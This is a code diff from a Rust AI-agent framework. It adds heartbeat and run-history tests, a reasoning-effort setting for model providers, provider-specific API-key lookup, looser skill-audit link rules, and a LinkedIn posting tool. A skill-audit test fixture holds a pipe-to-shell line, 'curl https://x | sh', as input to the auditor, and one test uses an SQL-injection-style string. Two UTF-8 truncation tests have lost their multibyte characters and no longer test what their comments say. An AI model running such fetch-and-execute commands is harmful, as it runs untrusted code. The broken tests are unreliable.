fn format_delivery_output_exactly_at_limit() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
// Header is "[low] T\n\n" = 10 chars, fill remaining to exactly 4096
let header_len = "[low] T\n\n".len();
let body = "x".repeat(4096 - header_len);
let output = HeartbeatEngine::format_delivery_output(&body, &task);
assert_eq!(output.len(), 4096);
}
#[test]
fn format_delivery_output_multibyte_truncation() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
// Build body of multi-byte chars that will exceed 4096 when combined with header
let body = "".repeat(2000); // each € = 3 bytes, 6000 bytes total
let output = HeartbeatEngine::format_delivery_output(&body, &task);
assert!(output.len() <= 4096);
// Must be valid UTF-8
let _ = output.as_str();
}
#[test]
fn format_delivery_output_preserves_body_content() {
let task = HeartbeatTask {
text: "Check email".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output(
"**Status:** completed\n**Summary:** All good",
&task,
);
assert!(output.contains("[high] Check email"));
assert!(output.contains("**Status:** completed"));
assert!(output.contains("**Summary:** All good"));
}
#[test]
fn format_delivery_output_strips_surrounding_whitespace() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output(" result \n\n", &task);
assert!(output.contains("\n\nresult"));
}
#[test]
fn format_delivery_output_all_priorities() {
for (priority, label) in [
(TaskPriority::High, "[high]"),
(TaskPriority::Medium, "[medium]"),
(TaskPriority::Low, "[low]"),
] {
let task = HeartbeatTask {
text: "X".into(),
priority,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output("ok", &task);
assert!(output.starts_with(label), "Expected {label} prefix");
}
}
// ── decision prompt additional tests ─────────────────────────
#[test]
fn decision_prompt_empty_tasks() {
let prompt = HeartbeatEngine::build_decision_prompt(&[]);
assert!(prompt.contains("Tasks:"));
assert!(prompt.contains("Do not explain"));
}
#[test]
fn decision_prompt_single_task() {
let tasks = vec![HeartbeatTask {
text: "Only task".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
}];
let prompt = HeartbeatEngine::build_decision_prompt(&tasks);
assert!(prompt.contains("1. [low] Only task"));
assert!(!prompt.contains("2."));
}
// ── is_runnable tests ───────────────────────────────────────
#[test]
fn is_runnable_active() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
assert!(task.is_runnable());
}
#[test]
fn is_runnable_paused() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Paused,
};
assert!(!task.is_runnable());
}
#[test]
fn is_runnable_completed() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Completed,
};
assert!(!task.is_runnable());
}
// ── Display impls ───────────────────────────────────────────
#[test]
fn task_priority_display() {
assert_eq!(format!("{}", TaskPriority::Low), "low");
assert_eq!(format!("{}", TaskPriority::Medium), "medium");
assert_eq!(format!("{}", TaskPriority::High), "high");
}
#[test]
fn task_status_display() {
assert_eq!(format!("{}", TaskStatus::Active), "active");
assert_eq!(format!("{}", TaskStatus::Paused), "paused");
assert_eq!(format!("{}", TaskStatus::Completed), "completed");
}
#[test]
fn task_display_all_priorities() {
for (p, label) in [
(TaskPriority::Low, "[low] T"),
(TaskPriority::Medium, "[medium] T"),
(TaskPriority::High, "[high] T"),
] {
let task = HeartbeatTask {
text: "T".into(),
priority: p,
status: TaskStatus::Active,
};
assert_eq!(format!("{task}"), label);
}
}
}
+292
View File
@@ -302,4 +302,296 @@ mod tests {
assert!(stored.ends_with(TRUNCATED_MARKER));
assert!(stored.len() <= MAX_OUTPUT_BYTES);
}
#[test]
fn list_runs_empty_db() {
let tmp = TempDir::new().unwrap();
let runs = list_runs(tmp.path(), 10).unwrap();
assert!(runs.is_empty());
}
#[test]
fn run_stats_empty_db() {
let tmp = TempDir::new().unwrap();
let (total, ok, err) = run_stats(tmp.path()).unwrap();
assert_eq!(total, 0);
assert_eq!(ok, 0);
assert_eq!(err, 0);
}
#[test]
fn record_run_with_none_output() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "T", "medium", now, now, "ok", None, 10, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs.len(), 1);
assert!(runs[0].output.is_none());
}
#[test]
fn record_run_max_history_one() {
let tmp = TempDir::new().unwrap();
let base = Utc::now();
for i in 0..5 {
let start = base + ChronoDuration::seconds(i);
let end = start + ChronoDuration::milliseconds(10);
record_run(
tmp.path(),
&format!("Task {i}"),
"medium",
start,
end,
"ok",
None,
10,
1, // keep only 1
)
.unwrap();
}
let runs = list_runs(tmp.path(), 10).unwrap();
assert_eq!(runs.len(), 1);
}
#[test]
fn truncate_output_exactly_at_limit() {
let exact = "x".repeat(MAX_OUTPUT_BYTES);
let result = truncate_output(&exact);
assert_eq!(result.len(), MAX_OUTPUT_BYTES);
assert!(!result.contains(TRUNCATED_MARKER));
}
#[test]
fn truncate_output_one_byte_over() {
let over = "x".repeat(MAX_OUTPUT_BYTES + 1);
let result = truncate_output(&over);
assert!(result.ends_with(TRUNCATED_MARKER));
assert!(result.len() <= MAX_OUTPUT_BYTES);
}
#[test]
fn truncate_output_multibyte_boundary() {
// Build a string of multi-byte chars that crosses the cutoff boundary
// Each '€' is 3 bytes in UTF-8
let euro_count = MAX_OUTPUT_BYTES / 3 + 10;
let input: String = "".repeat(euro_count);
let result = truncate_output(&input);
// Must be valid UTF-8 and end with the marker
assert!(result.ends_with(TRUNCATED_MARKER));
// Verify it's valid UTF-8 (would panic if not)
let _ = result.as_str();
}
// ── truncate_output additional edge cases ────────────────────
#[test]
fn truncate_output_empty_string() {
let result = truncate_output("");
assert_eq!(result, "");
}
#[test]
fn truncate_output_single_char() {
let result = truncate_output("x");
assert_eq!(result, "x");
}
#[test]
fn truncate_output_shorter_than_marker() {
let result = truncate_output("short");
assert_eq!(result, "short");
assert!(!result.contains(TRUNCATED_MARKER));
}
#[test]
fn truncate_output_4byte_utf8_boundary() {
// '𝄞' is 4 bytes in UTF-8 — test char boundary handling with 4-byte chars
let count = MAX_OUTPUT_BYTES / 4 + 10;
let input: String = "𝄞".repeat(count);
let result = truncate_output(&input);
assert!(result.ends_with(TRUNCATED_MARKER));
// Must remain valid UTF-8
let _ = result.as_str();
}
// ── record_run additional edge cases ─────────────────────────
#[test]
fn record_run_empty_string_output() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "T", "medium", now, now, "ok", Some(""), 10, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs.len(), 1);
// Empty string is stored as Some(""), not None
assert_eq!(runs[0].output.as_deref(), Some(""));
}
#[test]
fn record_run_special_chars_in_task_text() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
let special = "Task with 'quotes', \"doubles\", and SQL: DROP TABLE; --";
record_run(tmp.path(), special, "high", now, now, "ok", None, 10, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].task_text, special);
}
#[test]
fn record_run_zero_duration() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "T", "medium", now, now, "ok", None, 0, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].duration_ms, 0);
}
#[test]
fn record_run_negative_duration() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
// Negative duration shouldn't panic — SQLite stores it fine
record_run(tmp.path(), "T", "medium", now, now, "ok", None, -1, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].duration_ms, -1);
}
#[test]
fn record_run_unicode_output() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
let unicode_output = "日本語の結果 🎉 €100";
record_run(
tmp.path(),
"T",
"medium",
now,
now,
"ok",
Some(unicode_output),
10,
50,
)
.unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].output.as_deref(), Some(unicode_output));
}
// ── list_runs additional edge cases ──────────────────────────
#[test]
fn list_runs_limit_clamped_to_one() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
for i in 0..3 {
let start = now + ChronoDuration::seconds(i);
record_run(
tmp.path(),
&format!("T{i}"),
"medium",
start,
start,
"ok",
None,
10,
50,
)
.unwrap();
}
// limit=0 is clamped to 1
let runs = list_runs(tmp.path(), 0).unwrap();
assert_eq!(runs.len(), 1);
}
#[test]
fn list_runs_ordering_same_timestamp() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
// Insert multiple runs with the same timestamp
for i in 0..3 {
record_run(
tmp.path(),
&format!("Task {i}"),
"medium",
now,
now,
"ok",
None,
10,
50,
)
.unwrap();
}
let runs = list_runs(tmp.path(), 10).unwrap();
assert_eq!(runs.len(), 3);
// With same timestamp, ordered by id DESC → Task 2 first
assert!(runs[0].task_text.contains('2'));
assert!(runs[2].task_text.contains('0'));
}
// ── run_stats additional edge cases ──────────────────────────
#[test]
fn run_stats_only_errors() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "A", "high", now, now, "error", None, 10, 50).unwrap();
record_run(tmp.path(), "B", "high", now, now, "error", None, 10, 50).unwrap();
let (total, ok, err) = run_stats(tmp.path()).unwrap();
assert_eq!(total, 2);
assert_eq!(ok, 0);
assert_eq!(err, 2);
}
#[test]
fn run_stats_only_ok() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "A", "high", now, now, "ok", None, 10, 50).unwrap();
record_run(tmp.path(), "B", "high", now, now, "ok", None, 10, 50).unwrap();
let (total, ok, err) = run_stats(tmp.path()).unwrap();
assert_eq!(total, 2);
assert_eq!(ok, 2);
assert_eq!(err, 0);
}
#[test]
fn record_run_max_history_keeps_most_recent() {
let tmp = TempDir::new().unwrap();
let base = Utc::now();
for i in 0..5 {
let start = base + ChronoDuration::seconds(i);
let end = start + ChronoDuration::milliseconds(10);
record_run(
tmp.path(),
&format!("Task {i}"),
"medium",
start,
end,
"ok",
None,
10,
3,
)
.unwrap();
}
let runs = list_runs(tmp.path(), 10).unwrap();
assert_eq!(runs.len(), 3);
// Most recent 3 should be Task 4, 3, 2
assert!(runs[0].task_text.contains('4'));
assert!(runs[1].task_text.contains('3'));
assert!(runs[2].task_text.contains('2'));
}
}
+2
View File
@@ -191,6 +191,7 @@ pub async fn run_wizard(force: bool) -> Result<Config> {
notion: crate::config::NotionConfig::default(),
node_transport: crate::config::NodeTransportConfig::default(),
knowledge: crate::config::KnowledgeConfig::default(),
linkedin: crate::config::LinkedInConfig::default(),
};
println!(
@@ -563,6 +564,7 @@ async fn run_quick_setup_with_home(
notion: crate::config::NotionConfig::default(),
node_transport: crate::config::NodeTransportConfig::default(),
knowledge: crate::config::KnowledgeConfig::default(),
linkedin: crate::config::LinkedInConfig::default(),
};
config.save().await?;
+54
View File
@@ -41,6 +41,8 @@ pub struct OpenAiCompatibleProvider {
timeout_secs: u64,
/// Extra HTTP headers to include in all API requests.
extra_headers: std::collections::HashMap<String, String>,
/// Optional reasoning effort for GPT-5/Codex-compatible backends.
reasoning_effort: Option<String>,
/// Custom API path suffix (e.g. "/v2/generate").
/// When set, overrides the default `/chat/completions` path detection.
api_path: Option<String>,
@@ -179,6 +181,7 @@ impl OpenAiCompatibleProvider {
native_tool_calling: !merge_system_into_user,
timeout_secs: 120,
extra_headers: std::collections::HashMap::new(),
reasoning_effort: None,
api_path: None,
}
}
@@ -198,6 +201,12 @@ impl OpenAiCompatibleProvider {
self
}
/// Set reasoning effort for GPT-5/Codex-compatible chat-completions APIs.
pub fn with_reasoning_effort(mut self, reasoning_effort: Option<String>) -> Self {
self.reasoning_effort = reasoning_effort;
self
}
/// Set a custom API path suffix for this provider.
/// When set, replaces the default `/chat/completions` path.
pub fn with_api_path(mut self, api_path: Option<String>) -> Self {
@@ -363,6 +372,14 @@ impl OpenAiCompatibleProvider {
})
.collect()
}
fn reasoning_effort_for_model(&self, model: &str) -> Option<String> {
let id = model.rsplit('/').next().unwrap_or(model);
let supports_reasoning_effort = id.starts_with("gpt-5") || id.contains("codex");
supports_reasoning_effort
.then(|| self.reasoning_effort.clone())
.flatten()
}
}
#[derive(Debug, Serialize)]
@@ -373,6 +390,8 @@ struct ApiChatRequest {
#[serde(skip_serializing_if = "Option::is_none")]
stream: Option<bool>,
#[serde(skip_serializing_if = "Option::is_none")]
reasoning_effort: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
tools: Option<Vec<serde_json::Value>>,
#[serde(skip_serializing_if = "Option::is_none")]
tool_choice: Option<String>,
@@ -569,6 +588,8 @@ struct NativeChatRequest {
#[serde(skip_serializing_if = "Option::is_none")]
stream: Option<bool>,
#[serde(skip_serializing_if = "Option::is_none")]
reasoning_effort: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
tools: Option<Vec<serde_json::Value>>,
#[serde(skip_serializing_if = "Option::is_none")]
tool_choice: Option<String>,
@@ -1181,6 +1202,8 @@ impl OpenAiCompatibleProvider {
"does not support tools",
"function calling is not supported",
"tool_choice",
"tool call validation failed",
"was not in request",
]
.iter()
.any(|hint| lower.contains(hint))
@@ -1240,6 +1263,7 @@ impl Provider for OpenAiCompatibleProvider {
messages,
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: None,
tool_choice: None,
};
@@ -1362,6 +1386,7 @@ impl Provider for OpenAiCompatibleProvider {
messages: api_messages,
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: None,
tool_choice: None,
};
@@ -1472,6 +1497,7 @@ impl Provider for OpenAiCompatibleProvider {
messages: api_messages,
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: if tools.is_empty() {
None
} else {
@@ -1577,6 +1603,7 @@ impl Provider for OpenAiCompatibleProvider {
),
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tool_choice: tools.as_ref().map(|_| "auto".to_string()),
tools,
};
@@ -1720,6 +1747,7 @@ impl Provider for OpenAiCompatibleProvider {
messages,
temperature,
stream: Some(options.enabled),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: None,
tool_choice: None,
};
@@ -1861,6 +1889,7 @@ mod tests {
],
temperature: 0.4,
stream: Some(false),
reasoning_effort: None,
tools: None,
tool_choice: None,
};
@@ -2418,6 +2447,14 @@ mod tests {
);
}
#[test]
fn native_tool_schema_unsupported_detects_groq_tool_validation_error() {
assert!(OpenAiCompatibleProvider::is_native_tool_schema_unsupported(
reqwest::StatusCode::BAD_REQUEST,
r#"Groq API error (400 Bad Request): {"error":{"message":"tool call validation failed: attempted to call tool 'memory_recall={\"limit\":5}' which was not in request"}}"#
));
}
#[test]
fn prompt_guided_tool_fallback_injects_system_instruction() {
let input = vec![ChatMessage::user("check status")];
@@ -2441,6 +2478,22 @@ mod tests {
assert!(output[0].content.contains("shell_exec"));
}
#[test]
fn reasoning_effort_only_applies_to_gpt5_and_codex_models() {
let provider = make_provider("test", "https://example.com", None)
.with_reasoning_effort(Some("high".to_string()));
assert_eq!(
provider.reasoning_effort_for_model("gpt-5.3-codex"),
Some("high".to_string())
);
assert_eq!(
provider.reasoning_effort_for_model("openai/gpt-5"),
Some("high".to_string())
);
assert_eq!(provider.reasoning_effort_for_model("llama-3.3-70b"), None);
}
#[tokio::test]
async fn warmup_without_key_is_noop() {
let provider = make_provider("test", "https://example.com", None);
@@ -2617,6 +2670,7 @@ mod tests {
}],
temperature: 0.7,
stream: Some(false),
reasoning_effort: None,
tools: Some(tools),
tool_choice: Some("auto".to_string()),
};
+26
View File
@@ -680,6 +680,7 @@ pub struct ProviderRuntimeOptions {
pub zeroclaw_dir: Option<PathBuf>,
pub secrets_encrypt: bool,
pub reasoning_enabled: Option<bool>,
pub reasoning_effort: Option<String>,
/// HTTP request timeout in seconds for LLM provider API calls.
/// `None` uses the provider's built-in default (120s for compatible providers).
pub provider_timeout_secs: Option<u64>,
@@ -699,6 +700,7 @@ impl Default for ProviderRuntimeOptions {
zeroclaw_dir: None,
secrets_encrypt: true,
reasoning_enabled: None,
reasoning_effort: None,
provider_timeout_secs: None,
extra_headers: std::collections::HashMap::new(),
api_path: None,
@@ -818,6 +820,26 @@ fn resolve_provider_credential(name: &str, credential_override: Option<&str>) ->
if let Some(credential) = resolve_minimax_oauth_refresh_token(name) {
return Some(credential);
}
} else if name == "anthropic" || name == "openai" || name == "groq" {
// For well-known providers, prefer provider-specific env vars over the
// global api_key override, since the global key may belong to a different
// provider (e.g. a custom: gateway). This enables multi-provider setups
// where the primary uses a custom gateway and fallbacks use named providers.
let env_candidates: &[&str] = match name {
"anthropic" => &["ANTHROPIC_OAUTH_TOKEN", "ANTHROPIC_API_KEY"],
"openai" => &["OPENAI_API_KEY"],
"groq" => &["GROQ_API_KEY"],
_ => &[],
};
for env_var in env_candidates {
if let Ok(val) = std::env::var(env_var) {
let trimmed = val.trim().to_string();
if !trimmed.is_empty() {
return Some(trimmed);
}
}
}
return Some(trimmed_override.to_owned());
} else {
return Some(trimmed_override.to_owned());
}
@@ -1016,6 +1038,7 @@ fn create_provider_with_url_and_options(
// headers to OpenAI-compatible providers before boxing them as trait objects.
let compat = {
let timeout = options.provider_timeout_secs;
let reasoning_effort = options.reasoning_effort.clone();
let extra_headers = options.extra_headers.clone();
let api_path = options.api_path.clone();
move |p: OpenAiCompatibleProvider| -> Box<dyn Provider> {
@@ -1023,6 +1046,9 @@ fn create_provider_with_url_and_options(
if let Some(t) = timeout {
p = p.with_timeout_secs(t);
}
if let Some(ref effort) = reasoning_effort {
p = p.with_reasoning_effort(Some(effort.clone()));
}
if !extra_headers.is_empty() {
p = p.with_extra_headers(extra_headers.clone());
}
+29 -4
View File
@@ -22,6 +22,7 @@ pub struct OpenAiCodexProvider {
responses_url: String,
custom_endpoint: bool,
gateway_api_key: Option<String>,
reasoning_effort: Option<String>,
client: Client,
}
@@ -105,6 +106,7 @@ impl OpenAiCodexProvider {
custom_endpoint: !is_default_responses_url(&responses_url),
responses_url,
gateway_api_key: gateway_api_key.map(ToString::to_string),
reasoning_effort: options.reasoning_effort.clone(),
client: Client::builder()
.timeout(std::time::Duration::from_secs(120))
.connect_timeout(std::time::Duration::from_secs(10))
@@ -304,9 +306,10 @@ fn clamp_reasoning_effort(model: &str, effort: &str) -> String {
effort.to_string()
}
fn resolve_reasoning_effort(model_id: &str) -> String {
let raw = std::env::var("ZEROCLAW_CODEX_REASONING_EFFORT")
.ok()
fn resolve_reasoning_effort(model_id: &str, configured: Option<&str>) -> String {
let raw = configured
.map(ToString::to_string)
.or_else(|| std::env::var("ZEROCLAW_CODEX_REASONING_EFFORT").ok())
.and_then(|value| first_nonempty(Some(&value)))
.unwrap_or_else(|| "xhigh".to_string())
.to_ascii_lowercase();
@@ -663,7 +666,10 @@ impl OpenAiCodexProvider {
verbosity: "medium".to_string(),
},
reasoning: ResponsesReasoningOptions {
effort: resolve_reasoning_effort(normalized_model),
effort: resolve_reasoning_effort(
normalized_model,
self.reasoning_effort.as_deref(),
),
summary: "auto".to_string(),
},
include: vec!["reasoning.encrypted_content".to_string()],
@@ -951,6 +957,24 @@ mod tests {
);
}
#[test]
fn resolve_reasoning_effort_prefers_configured_override() {
let _guard = EnvGuard::set("ZEROCLAW_CODEX_REASONING_EFFORT", Some("low"));
assert_eq!(
resolve_reasoning_effort("gpt-5-codex", Some("high")),
"high".to_string()
);
}
#[test]
fn resolve_reasoning_effort_uses_legacy_env_when_unconfigured() {
let _guard = EnvGuard::set("ZEROCLAW_CODEX_REASONING_EFFORT", Some("minimal"));
assert_eq!(
resolve_reasoning_effort("gpt-5-codex", None),
"low".to_string()
);
}
#[test]
fn parse_sse_text_reads_output_text_delta() {
let payload = r#"data: {"type":"response.created","response":{"id":"resp_123"}}
@@ -1125,6 +1149,7 @@ data: [DONE]
secrets_encrypt: false,
auth_profile_override: None,
reasoning_enabled: None,
reasoning_effort: None,
provider_timeout_secs: None,
extra_headers: std::collections::HashMap::new(),
api_path: None,
+33 -13
View File
@@ -287,6 +287,21 @@ fn audit_markdown_link_target(
match linked_path.canonicalize() {
Ok(canonical_target) => {
if !canonical_target.starts_with(root) {
// Allow cross-skill markdown references that stay within the
// overall skills directory (e.g., ~/.zeroclaw/workspace/skills).
if let Some(skills_root) = skills_root_for(root) {
if canonical_target.starts_with(&skills_root) {
// The link resolves to another installed skill under the same
// trusted skills root, so it is considered safe.
if !canonical_target.is_file() {
report.findings.push(format!(
"{rel}: markdown link must point to a file ({normalized})."
));
}
return;
}
}
report.findings.push(format!(
"{rel}: markdown link escapes skill root ({normalized})."
));
@@ -340,6 +355,19 @@ fn is_cross_skill_reference(target: &str) -> bool {
!stripped.contains('/') && !stripped.contains('\\') && has_markdown_suffix(stripped)
}
/// Best-effort detection of the shared skills directory root for an installed skill.
/// This looks for the nearest ancestor directory named "skills" and treats it as
/// the logical root for sibling skill references.
fn skills_root_for(root: &Path) -> Option<PathBuf> {
let mut current = root;
loop {
if current.file_name().is_some_and(|name| name == "skills") {
return Some(current.to_path_buf());
}
current = current.parent()?;
}
}
fn relative_display(root: &Path, path: &Path) -> String {
if let Ok(rel) = path.strip_prefix(root) {
if rel.as_os_str().is_empty() {
@@ -713,7 +741,8 @@ command = "echo ok && curl https://x | sh"
#[test]
fn audit_allows_existing_cross_skill_reference() {
// Cross-skill references to existing files should be allowed if they resolve within root
// Cross-skill references to existing files should be allowed as long as they
// resolve within the shared skills directory (e.g., ~/.zeroclaw/workspace/skills)
let dir = tempfile::tempdir().unwrap();
let skills_root = dir.path().join("skills");
let skill_a = skills_root.join("skill-a");
@@ -727,19 +756,10 @@ command = "echo ok && curl https://x | sh"
.unwrap();
std::fs::write(skill_b.join("SKILL.md"), "# Skill B\n").unwrap();
// Audit skill-a - the link to ../skill-b/SKILL.md should be allowed
// because it resolves within the skills root (if we were auditing the whole skills dir)
// But since we audit skill-a directory only, the link escapes skill-a's root
let report = audit_skill_directory(&skill_a).unwrap();
assert!(
report
.findings
.iter()
.any(|finding| finding.contains("escapes skill root")
|| finding.contains("missing file")),
"Expected link to either escape root or be treated as cross-skill reference: {:#?}",
report.findings
);
// The link to ../skill-b/SKILL.md should be allowed because it stays
// within the shared skills root directory.
assert!(report.is_clean(), "{:#?}", report.findings);
}
#[test]
+804
View File
@@ -0,0 +1,804 @@
use super::linkedin_client::{ImageGenerator, LinkedInClient};
use super::traits::{Tool, ToolResult};
use crate::config::{LinkedInContentConfig, LinkedInImageConfig};
use crate::security::SecurityPolicy;
use async_trait::async_trait;
use serde_json::json;
use std::path::PathBuf;
use std::sync::Arc;
pub struct LinkedInTool {
security: Arc<SecurityPolicy>,
workspace_dir: PathBuf,
api_version: String,
content_config: LinkedInContentConfig,
image_config: LinkedInImageConfig,
}
impl LinkedInTool {
pub fn new(
security: Arc<SecurityPolicy>,
workspace_dir: PathBuf,
api_version: String,
content_config: LinkedInContentConfig,
image_config: LinkedInImageConfig,
) -> Self {
Self {
security,
workspace_dir,
api_version,
content_config,
image_config,
}
}
fn is_write_action(action: &str) -> bool {
matches!(action, "create_post" | "comment" | "react" | "delete_post")
}
fn build_content_strategy_summary(&self) -> String {
let c = &self.content_config;
let mut parts = Vec::new();
if !c.persona.is_empty() {
parts.push(format!("## Persona\n{}", c.persona));
}
if !c.topics.is_empty() {
parts.push(format!("## Topics\n{}", c.topics.join(", ")));
}
if !c.rss_feeds.is_empty() {
let feeds: Vec<String> = c.rss_feeds.iter().map(|f| format!("- {f}")).collect();
parts.push(format!(
"## RSS Feeds (fetch titles only for inspiration)\n{}",
feeds.join("\n")
));
}
if !c.github_users.is_empty() {
parts.push(format!(
"## GitHub Users (check public activity)\n{}",
c.github_users.join(", ")
));
}
if !c.github_repos.is_empty() {
let repos: Vec<String> = c.github_repos.iter().map(|r| format!("- {r}")).collect();
parts.push(format!(
"## GitHub Repos (highlight project work)\n{}",
repos.join("\n")
));
}
if !c.instructions.is_empty() {
parts.push(format!("## Posting Instructions\n{}", c.instructions));
}
if parts.is_empty() {
return "No content strategy configured. Add [linkedin.content] settings to config.toml with rss_feeds, github_repos, persona, topics, and instructions.".to_string();
}
parts.join("\n\n")
}
}
#[async_trait]
impl Tool for LinkedInTool {
fn name(&self) -> &str {
"linkedin"
}
fn description(&self) -> &str {
"Manage LinkedIn: create posts, list your posts, comment, react, delete posts, view engagement, get profile info, and read the configured content strategy. Requires LINKEDIN_* credentials in .env file."
}
fn parameters_schema(&self) -> serde_json::Value {
json!({
"type": "object",
"properties": {
"action": {
"type": "string",
"enum": [
"create_post",
"list_posts",
"comment",
"react",
"delete_post",
"get_engagement",
"get_profile",
"get_content_strategy"
],
"description": "The LinkedIn action to perform"
},
"text": {
"type": "string",
"description": "Post or comment text content"
},
"visibility": {
"type": "string",
"enum": ["PUBLIC", "CONNECTIONS"],
"description": "Post visibility (default: PUBLIC)"
},
"article_url": {
"type": "string",
"description": "URL for link preview in a post"
},
"article_title": {
"type": "string",
"description": "Title for the article (requires article_url)"
},
"post_id": {
"type": "string",
"description": "LinkedIn post URN identifier"
},
"reaction_type": {
"type": "string",
"enum": ["LIKE", "CELEBRATE", "SUPPORT", "LOVE", "INSIGHTFUL", "FUNNY"],
"description": "Type of reaction to add to a post"
},
"count": {
"type": "integer",
"description": "Number of posts to retrieve (default 10, max 50)"
},
"generate_image": {
"type": "boolean",
"description": "Generate an AI image for the post (requires [linkedin.image] config). Falls back to branded SVG card if all providers fail."
},
"image_prompt": {
"type": "string",
"description": "Custom prompt for image generation. If omitted, a prompt is derived from the post text."
},
"scheduled_at": {
"type": "string",
"description": "Schedule the post for future publication. ISO 8601 / RFC 3339 timestamp, e.g. '2026-03-17T08:00:00Z'. The post is saved as a draft with scheduledPublishTime on LinkedIn."
}
},
"required": ["action"]
})
}
async fn execute(&self, args: serde_json::Value) -> anyhow::Result<ToolResult> {
let action = args
.get("action")
.and_then(|v| v.as_str())
.ok_or_else(|| anyhow::anyhow!("Missing required 'action' parameter"))?;
// Write actions require autonomy check
if Self::is_write_action(action) && !self.security.can_act() {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Action blocked: autonomy is read-only".into()),
});
}
// All actions are rate-limited
if !self.security.record_action() {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Action blocked: rate limit exceeded".into()),
});
}
let client = LinkedInClient::new(self.workspace_dir.clone(), self.api_version.clone());
match action {
"get_content_strategy" => {
let strategy = self.build_content_strategy_summary();
return Ok(ToolResult {
success: true,
output: strategy,
error: None,
});
}
"create_post" => {
let text = match args.get("text").and_then(|v| v.as_str()).map(str::trim) {
Some(t) if !t.is_empty() => t.to_string(),
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'text' parameter for create_post".into()),
});
}
};
let visibility = args
.get("visibility")
.and_then(|v| v.as_str())
.unwrap_or("PUBLIC");
let generate_image = args
.get("generate_image")
.and_then(|v| v.as_bool())
.unwrap_or(false);
let article_url = args.get("article_url").and_then(|v| v.as_str());
let article_title = args.get("article_title").and_then(|v| v.as_str());
let scheduled_at = args.get("scheduled_at").and_then(|v| v.as_str());
if article_title.is_some() && article_url.is_none() {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("'article_title' requires 'article_url' to be provided".into()),
});
}
// Image generation flow
if generate_image && self.image_config.enabled {
let image_prompt =
args.get("image_prompt")
.and_then(|v| v.as_str())
.map(String::from)
.unwrap_or_else(|| {
format!(
"Professional, modern illustration for a LinkedIn post about: {}",
if text.len() > 200 { &text[..200] } else { &text }
)
});
let generator =
ImageGenerator::new(self.image_config.clone(), self.workspace_dir.clone());
match generator.generate(&image_prompt).await {
Ok(image_path) => {
let image_bytes = tokio::fs::read(&image_path).await?;
let creds = client.get_credentials().await?;
let image_urn = client
.upload_image(&image_bytes, &creds.access_token, &creds.person_id)
.await?;
let post_id = client
.create_post_with_image(&text, visibility, &image_urn, scheduled_at)
.await?;
// Clean up temp file
let _ = ImageGenerator::cleanup(&image_path).await;
let action_word = if scheduled_at.is_some() {
"scheduled"
} else {
"published"
};
return Ok(ToolResult {
success: true,
output: format!(
"Post {action_word} with image. Post ID: {post_id}, Image: {image_urn}"
),
error: None,
});
}
Err(e) => {
// Image generation failed entirely — post without image
tracing::warn!("Image generation failed, posting without image: {e}");
}
}
}
let post_id = client
.create_post(&text, visibility, article_url, article_title, scheduled_at)
.await?;
let action_word = if scheduled_at.is_some() {
"scheduled"
} else {
"published"
};
Ok(ToolResult {
success: true,
output: format!("Post {action_word} successfully. Post ID: {post_id}"),
error: None,
})
}
"list_posts" => {
let count = args
.get("count")
.and_then(|v| v.as_u64())
.unwrap_or(10)
.clamp(1, 50) as usize;
let posts = client.list_posts(count).await?;
Ok(ToolResult {
success: true,
output: serde_json::to_string(&posts)?,
error: None,
})
}
"comment" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'post_id' parameter for comment".into()),
});
}
};
let text = match args.get("text").and_then(|v| v.as_str()).map(str::trim) {
Some(t) if !t.is_empty() => t.to_string(),
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'text' parameter for comment".into()),
});
}
};
let comment_id = client.add_comment(post_id, &text).await?;
Ok(ToolResult {
success: true,
output: format!("Comment posted successfully. Comment ID: {comment_id}"),
error: None,
})
}
"react" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
